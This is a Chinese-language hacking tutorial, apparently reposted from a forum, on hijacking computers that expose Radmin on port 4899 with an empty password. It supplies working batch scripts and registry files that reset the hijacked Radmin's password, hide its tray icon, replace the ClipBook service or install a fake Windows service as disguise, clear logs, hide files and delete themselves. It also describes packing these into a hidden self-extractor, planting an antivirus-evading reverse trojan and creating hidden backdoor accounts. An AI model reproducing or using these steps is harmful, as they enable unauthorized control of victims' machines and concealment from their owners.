攻擊4899肉雞

文章作者：魔女の條件

對于4899肉雞,相信大家都不會陌生吧。Radmin遠程控制軟件最大的優點就是功能齊全，便于操作，能夠躲避一些軟件的查殺。實在是居家旅行，殺人滅口，絕好武器。那么……有的朋友要問了多么好的寶馬良駒在哪里可以找到啊？問的好，各大黑客網站均能下載，童叟無欺啊！（這段對白怎么這么耳熟啊？）

第一章 4899空口令肉雞爭奪戰

4899空口令肉雞是由一些超級菜鳥們用Windows NT/2000 自動攻擊探測機對他感興趣的某段IP細心的，無微不至的掃描孕育而生的~~~(鼓掌,有請我們今天的主角,4899空口令肉雞隆重登場,哎呀,誰拿西紅柿扔我?忒不講公德呢?扔也不扔個紅的，綠的怎么吃啊?)
既然4899空口令肉雞這個多，那么偶就先從它的由來說起吧！Windows NT/2000 自動攻擊探測機 這款掃描軟件不但集成了掃描器的特點，還添加了一些漏洞的利用功能。它能夠對掃描出IIS溢出的，弱口令的和SA空口令的電腦上傳并安裝遠程圖形控制軟件Radmin，即把R_Server.exe，AdmDll.dll和raddrv.dll這三個文件上傳到其電腦系統跟目錄%systemroot%\system32子目錄下，并行運行R_Server.exe可執行文件。由于遠程上傳的Radmin沒有經過配置，因此在對方機子的任務欄里出現了Radmin服務程序的托盤(如圖1-1)。這樣不就成個此地無銀三百兩，機器的主人一定能發現這個不正常的托盤。我想他第一個動作就是把鼠標移動到托盤位置，一點就顯示出了有某某IP正在連接本機。如果是個只知道上網聊天的MM她第一個動作就是把網斷了，逃過別人的控制再說。如果是個有經驗的老鳥那么各位就要小心了，他會通過顯示出的IP查到你的電腦或者你用來掃描的肉雞，這樣就大大的不妙了。所以了，這個托盤的隱藏是非常必要和急切的。
在做我們的工作之前，要做好一些準備活動。首先把4899空口令肉雞設置上密碼，在Radmin的CMD控件下輸入命令r_server.exe /port:520 /pass:hackbase /save /silence。有些同僚總是抱怨這個命令不好用，我看過他們出問題的動畫。無論是在CMD命令下或者在"運行"下輸入這個命令都是正確的，而他們出錯的原因就是沒有添加參數"/save"保存，和參數"/silence"后臺安裝。這樣設置好連接端口和密碼，同道中人就算用"4899空口令掃描器"掃到你做的肉雞也晚了，偶已經添加過密碼了，而端口在肉雞重起后能夠修改成功。接下來我們就要把一個反彈木馬放到肉雞上，以免對方是動態IP，肉雞就飛掉了。這里我們可以用灰鴿子VIP或黑洞2004這兩個反彈木馬都很不錯的哦~~~。順便說一句您的木馬一定要做過特征碼修改或者加殼啊，這樣能夠躲避對方殺毒軟件的查殺。在這里再說句題外話對木馬加殼不是加的殼越多就越安全的，這樣大家就走入了多加殼的誤區。這樣不但不能躲過殺毒軟件的查殺，還有可能使木馬的功能受到影響。對喜歡加殼躲殺毒軟件的朋友偶建議下先把木馬脫殼，然后再加個不知名的殼（ASPack, UPX這些加殼軟件的殼已經被有些殺毒軟件列入黑客程序列表了），然后在用幾款世面流行的殺毒軟件在本地機器事先做個放殺毒檢測。
這樣的黑客程序才是我們的殺手锏。
前期工作制作完畢后，您就可以耐心的工作了。為了做到隱藏托盤的目的，偶想了兩個辦法：
第一， 在您的機器上事先安裝并配置好Radmin，把注冊表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin導出為radmin.reg，這個就是絕對符合您意愿的Radmin配置，把radmin.reg上傳到對方機器輸入命令regedit /s radmin.reg。這樣在機器重起或者您幫助他重起Radmin服務的時候，任務欄里的Radmin托盤就消失了。
第二， 寫個批處理文件重新調整Radmin配置。批處理文件內容如下：
@echo off
@r_server.exe /port:520 /pass:hackbase /save /silence
echo Windows Registry Editor Version 5.00 >ftp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] >>ftp.reg
echo "DisableTrayIcon"=hex:01,00,00,00 >>ftp.reg
regedit /s ftp.reg
del ftp.reg
到這里菜鳥的"保雞"反擊戰已經告一段落。剛才我們不是還放了個灰鴿子嗎，這樣這臺肉雞上就有我們的兩匹寶馬良駒了。小樣讓你跑，還是逃不出如來佛的掌心吧！呵呵，我得意的笑~~~
在長期的摸索研究工作中，偶發現個Windows NT/2000 自動攻擊探測機的小BUG。等偶慢慢道來，各位看官聽仔細啊。Radmin 3.0影子版的客戶端是Radmin公司開發的，而服務端程序缺因為種種原因，沒有和各位見面。有的說是Radmin公司在開發新的功能，服務端沒有開發完；有的說Radmin公司現在只對付費用戶提供服務端，這些偶就不得而知了。可是我們敬愛的影子為我們制造出了"Radmin 3.0服務端"其本質就是2.0版本的部分修改，對其圖標做了修改和加殼處理。可是在漢化過程中，不知道什么原因，它在任務欄里的Radmin托盤變成了一個空白的地方，要是不注意是看不出來的（如圖1-2、1-3）。所以了，我們在運行Windows NT/2000 自動攻擊探測機掃描機子的時候，把它同目錄下釋放出來的R_Server.exe，替換成3.0版本的R_Server.exe。這樣掃描出來上傳圖形控制軟件的機器，在其任務欄里就出現了一個空白的地方。當把鼠標點到上面的時候也沒有了某某IP正在連接的提示，這樣就欺騙了一些機主。呵呵，旁門左道大家不要見笑啊。可是這個小BUG啟發了我的另一個思路，就是把我們的Radmin.exe自動運行的配置包重命名為R_Server.exe，然后替換掉R_Server.exe，我們不就有了所以自己的機子了嗎？好，說干就干。把我的Radmin自解壓包替換掉R_Server.exe，可是這回Windows NT/2000 自動攻擊探測機就沒有了上傳成功的小提示。（如圖：1-4）（廣告過后更精彩）我一直對這個驗證方法不甚了解，想找作者問問，可是他老人家還換QQ了。哪位高手有高見，請不吝賜教，偶的QQ：9500142。言歸正傳，那也難不倒我，我們把掃描出來有漏洞的所有IP復制到一個文本文件中，用superscan導入IP列表，掃描我設置Radmin服務的端口，這樣被我上傳Radmin的機器就都上門報道了。Yeah!（如圖：1-5）

第二章 Radmin 服務端高級配置

既然我們對Radmin這么情有獨鐘，那么我們就要打造不死系的超級后門木馬。具推斷當前安裝過Radmin控制軟件的肉雞占安全性低級的電腦的80%左右，所以我們上傳木馬之前，要把其系統中可能存在的Radmin服務停止掉，替換成我們的服務為己所用。絕大部分的安裝Radmin的肉雞都是用的R_Server.exe程序。可是種植的原始情況分為兩種：
第一 就如上面所說那樣，是用Windows NT/2000 自動攻擊探測機上傳安裝的，其安裝服務的名稱為"radmm"。啟動和停止該服務的命令分別為"net start radmm"和"net stop radmm"。
第二 一些喜歡偷懶的朋友，把自己的Radmin是默認的R_Server.exe程序，其安裝服務的名稱為"Remote Administrator Service"。啟動和停止該服務的命令分別為"net start r_server"和"net stop r_server"。
偶發現一個對付這兩種配置的小竅門，就是可以用"r_server.exe /start"和"r_server.exe /stop"啟動和停止服務，然后我們在替換為自己的配置。
Follow Me！
對配置Radmin自解壓程序的，我有兩個思路可供大家參詳，希望對您能配置能夠有所啟發和幫助.
第一 就是替換系統服務的方法。如果您對Windows系統服務的工作機理不甚了解，那么請跳過這里，看接下來的第二種配置.
1、編寫一個批處理文件，命名為first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
這樣做是假定肉雞上已經由黑友安裝過Radmin服務，殺無赦。
2、接下來我拿系統的ClipBook服務開刀做下替換。編寫一個批處理文件，命名為baby.bat
--------------------------------------------
@echo off
@sc stop ClipBook
@sc delete ClipBook
@sc stop r_server

@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@del %systemroot%\system32\dllcache\ClipSrv.exe
@del %systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\ClipSrv.exe
%systemroot%\system32\ClipSrv.exe
@copy %systemroot%\system32\Setup\raddrv.dll
%systemroot%\system32\raddrv.dll
@copy %systemroot%\system32\Setup\AdmDll.dll
%systemroot%\system32\AdmDll.dll

@ClipSrv.exe /install /silence
@regedit /s radmin.reg
@regedit /s server.reg

@sc config ClipBook start=auto
@sc start ClipBook
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del baby.exe
@shutdown.exe -f -r
@del first.bat
@del baby.bat
@del clss.exe
@del shutdown.exe
--------------------------------------------
Radmin.reg注冊表文件時服務配置,Sc是微軟服務修改程序(比爾其實對我們還滿不錯的哦，嘿嘿)，clss.exe是日志清除工具(大家要養成勤掃地的習慣噢！)，shutdown.exe是關機程序,這個程序無關緊要，關鍵看您的性子怎么樣了（急性子的黑友建議使用）。Server.reg就是ClipBook服務的描述信息了，要偽裝當然要做的夠專業啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]
"Description"="啟用"剪貼簿查看器"儲存信息并與遠程計算機共享。如果此服務終止，"剪貼簿查看器" 將無法與遠程計算機共享信息。如果此服務被禁用，任何依賴它的服務將無法啟動。"
"DisplayName"="ClipBook"

上面的信息是由原ClipBook服務所對應的注冊表鍵值
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv] 提取出來的。
因為分支包含了部分電腦路徑和安全信息，每個電腦都有些許區別，所以把精煉的東西提取出來做為我們的偽裝信息。
然后，把我們所用到的工具、注冊表文件、批處理文件打包。配置RAR高級自解壓格式所選項嘀時候，注意那個解壓路徑 寫成%systemroot%\system32\Setup這個目錄
步驟1 選擇『在當前文件夾中創建』
步驟2 在『解壓后運行』輸入baby.bat
步驟3 在『解壓前運行』輸入first.bat
步驟4 選擇RAR高級自解壓縮選項中的『模式』改兩個地方，選擇『全部隱藏』和『覆蓋所有文件』。命名自解壓縮程序命為baby.exe
第二 就是添加一個完全屬于偶嘀服務的方法。
1、編寫一個批處理文件，命名為first.bat
--------------------------------------------
@echo off
r_server.exe /stop
--------------------------------------------
呵呵，安全第一。
2、接下來偶為我親愛的小馬創建個服務。
服務名稱：wmipd
顯示名稱：Windows Management Instrumentation Player Drivers
編寫一個批處理文件，命名為boy.bat
--------------------------------------------
@echo off
@sc stop r_server

@del %systemroot%\system32\AdmDll.dll
@del %systemroot%\system32\raddrv.dll
@del %systemroot%\system32\R_Server.exe
@wmsrv.exe /install /silence
@regedit /s radmin.reg
@net start wmsrv
@attrib +r +h %systemroot%\system32\drivers\wmsrv.exe
@attrib +r +h %systemroot%\system32\drivers\admdll.dll
@attrib +r +h %systemroot%\system32\drivers\raddrv.dll
@regedit /s server.reg

@sc config Windows Management Instrumentation Player Drivers start=auto
@sc start Windows Management Instrumentation Player Drivers
@sc delete r_server

@del radmin.reg
@del server.reg
@del sc.exe
@clss.exe
@cls
@del boy.exe
@del first.bat
@del boy.bat
--------------------------------------------
Radmin.reg注冊表文件時服務配置,Sc是微軟服務修改程序，clss.exe是日志清除工具。Server.reg就是Windows Management Instrumentation Player Drivers服務的描述信息了，要偽裝當然要做的夠專業啊。
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wmipd]
"Description"="為Windows Media Player提供加載進程及為其他的移動媒體，驅動程序和庫提供基層安全協議服務。"
"DisplayName"="Windows Management Instrumentation Player Drivers"

然后，把我們所用到的工具、注冊表文件、批處理文件打包。配置RAR高級自解壓格式所選項嘀時候，注意那個解壓路徑 寫成%systemroot%\system32\drivers這個目錄
步驟1 選擇『在當前文件夾中創建』
步驟2 在『解壓后運行』輸入boy.bat
步驟3 在『解壓前運行』輸入first.bat
步驟4 選擇RAR高級自解壓縮選項中的『模式』改兩個地方，選擇『全部隱藏』和『覆蓋所有文件』。命名自解壓縮程序命為boy.exe

如果在Radmin服務已經安裝的前提下，還可以用Sc.exe把它的服務信息修改了，在這里我就不做演示了，大家動手做做~~~

優點：
1.在系統服務中看見的是Windows Management Instrumentation Player Drivers服務
（可以自定義）
2.服務說明是 為Windows Media Player提供加載進程及為其他的移動媒體，驅動程序和庫提供基層安全協議服務
3.在cmd命令提示符下面，使用net start命令看見的是自啟動服務是
Windows Management Instrumentation Player Drivers
4.在進程中看見的是wmsrv（可以自定義，在boy.bat文件中相應的位置改一下，注意不要和已有的系統進程起沖突）

第三章 Radmin的訪問權限的設置

設置恰當Radmin的訪問權限，能夠更好的方便在線教學工作的開展，還可以讓高手幫
您設置一些東西和遠程維護系統，又不會擔心別人窺探您的隱私或給下個木馬類的好東東。
（呵呵~~~~偶不是貶低高手的道德噢，請高手們別生氣~~~）
設置Radmin的訪問權限的，首先要設置一個登陸用的帳號net user hackbase neugirl /add
用戶所屬組為user，這個權限已經夠用了。
輸入r_server.exe /setup命令調出Radmin服務端設置程序

步驟1 選擇『設置參數』，其他參數的配置我在這就不多說了。現在我們關鍵講述下『連接確定』的設置
① 如果是做在線教學工作或遠程協助，在這里選擇『使用用戶許可』---『連接超時自動拒絕』超時時間，設置的長點。這里我設置為30秒。（如圖：3-1）
② 如果您要是在肉雞上建立的用戶，使用遠程操作，那么『連接確定』就不要設置了。免得跳出個要求連接的對話框把管理員嚇壞了，這樣就不好了。

步驟2 選擇『設置密碼』---『使用NT用戶安全驗證』，激活『確定使用』，然后點擊『許可』---『添加』。然后會彈出一個『Add user/group』的會話框，點擊左下角的『顯示用戶』，這樣電腦中的所有組和用戶都顯示出來了。選中偶剛才新建的hackbase帳戶，添加到右邊的會話框中，在右上角的『存取權利』中選中您希望為hackbase該用戶開啟的訪問權限。（如圖：3-2）
具體權限分配：
Special access 特殊權限
All access(RTVFC) 所有權限
Full control of screen 完全控制
File transfer 文件傳送
View of screen 查看屏幕
Telnet Telnet連接
Redirect 重定向（這個功能偶一直沒有找到是控制什么的，請高手賜教）
No access 無權限

然后一路點OK，回到Radmin服務端設置程序后點擊『安裝程序』，等到安裝通知提示"服務安裝完成"后，在CMD命令提示符下輸入命令net start r_server啟動服務。
步驟3 樣您在客戶端連接服務端電腦的時候就彈出『輸入NT用戶』的對話框，在這里我填寫的是 用戶名：hackbase 密碼：neugirl 所屬域（這個可以不填寫）（如圖：3-3）

其中Redirect 重定向這個控制什么，偶一直沒有弄明白。請請高手賜教。經過妹妹偶做過大量試驗證實：Radmin的訪問權限的設置適合于Windows 2000和Windows 2003系列各個版本上使用，對于Windows XP 系統Radmin的2.1和3.2版本都不支持。不知為何原因，希望高手能夠指點。如果想對遠程主機做Radmin的訪問權限配置只要在本地主機事先建立一個帳戶，然后分配所希望開放的權限，點擊『安裝程序』，然后在注冊表[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Users]分支中就會出現您分配過權限的帳戶名，在它的鍵值中有該用戶所屬域的"組"及"Radmin控制權限"，把這個注冊表文件導入到遠程主機中，然后在其電腦中建立了同用戶名的賬號，這樣就全部搞定了。
有興趣的朋友還可以建個隱藏賬號作為我們的永久后門！

后記：下面還有一個我寫的批處理文件，是用來定時運行Radmin程序的，雖然微軟公司的系統維護工具soon和sleep都能夠定時運行程序，可使用自己寫的批處理文件能夠達到目的，也是很欣慰的。嘿嘿
這里說明下批處理文件編寫的思路：首先查詢本機的當前時間，當然把批處理文件放到肉雞上就能查肉雞的時間了。然后把讀取的時間暫時存儲在內存中，把時間函數拆分為"小時"和"分鐘"兩部分，付值到tokens調用的兩個函數中。在set /a mm=%mm%+2一句中添加上你希望延長多久再運行程序。

@echo off
color 0A
cls

Rem ===============以下是radmin.bat的內容=================
@echo off
echo 正在查詢本機的當前時間
echo.
net time \\127.0.0.1 /set /y
for /f "tokens=1,2 delims=:" %%i in ("%time%") do set /a hh=%%i & set /a mm=%%j
echo %1當前時間為%hh%:%mm%
set /a mm=%mm%+2
if /i %mm% geq 60 set /a mm=0 & set /a hh=%hh%+1
if /i %hh% geq 24 set /a hh=0
set tm=%hh%:%mm%
echo.
echo 設置啟動AT命令運行的時間為%tm%
echo.
at \\127.0.0.1 %tm% net stop r_server
Rem ========================完=============================

echo ======================================================
echo 魔女の條件---Radmin自啟動程序
echo 黑客基地 _blank>www.hackbase.com
echo ======================================================
echo 最多再過120秒，Radmin服務就會被啟動，請稍侯...
echo 請明智地使用，否則可能導致民事或刑事處罰!
echo 歡迎到黑客基地論壇發表高見或者用QQ聯系偶!
echo
echo 版權所有:魔女の條件
echo QICQ:9500142
echo E-mail:lucifer@hackbase.com
echo ------------------------------------------------------

在配置Radmin服務端的時候除了對程序的免查殺處理，還有對其程序圖標作下修改，建議使用劍鷹文件合并器或用灰鴿子圖標修改器修改成微軟系統內部圖標。對于Radmin啟動隱藏請參見《黑客X檔案》第九期《Radmin之自啟動》，風寫的這個自啟動方法很有見地。

以上就是偶對Radmin這款寶馬良駒的系統分析和經驗總結，有什么不足之處，希望高手們能夠加以勘正，我的聯系方式是 E-mail:Lucifer@hackbase.com OICQ：9500142

 

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: 4899
相關日誌: